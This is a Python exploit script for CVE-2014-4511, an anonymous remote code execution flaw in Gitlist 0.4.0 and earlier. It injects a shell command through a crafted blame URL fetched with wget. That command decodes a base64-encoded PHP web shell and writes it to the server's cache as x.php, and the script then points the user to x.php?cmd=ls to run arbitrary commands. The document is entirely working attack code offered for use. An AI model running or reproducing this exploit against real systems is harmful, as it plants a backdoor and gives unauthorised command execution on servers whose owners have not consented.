from commands import getoutput import urllib import sys """ Exploit Title: Gitlist <= 0.4.0 anonymous RCE Date: 06/20/2014 Author: drone (@dronesec) Vendor Homepage: Software link: Version: <= 0.4.0 Fixed in: 0.5.0 Tested on: Debian 7 More information: cve: CVE-2014-4511 """ if len(sys.argv) <= 1: print '%s: [url to git repo] {cache path}' % sys.argv[0] print ' Example: python %s http://localhost/gitlist/my_repo.git' % sys.argv[0] print ' Example: python %s http://localhost/gitlist/my_repo.git /var/www/git/cache' % sys.argv[0] sys.exit(1) url = sys.argv[1] url = url if url[-1] != '/' else url[:-1] path = "/var/www/gitlist/cache" if len(sys.argv) > 2: path = sys.argv[2] print '[!] Using cache location %s' % path # payload payload = "PD9zeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pgo=" # sploit; python requests does not like this URL, hence wget is used mpath = '/blame/master/""`echo {0}|base64 -d > {1}/x.php`'.format(payload, path) mpath = url+ urllib.quote(mpath) out = getoutput("wget %s" % mpath) if '500' in out: print '[!] Shell dropped; go hit %s/cache/x.php?cmd=ls' % url.rsplit('/', 1)[0] else: print '[-] Failed to drop' print out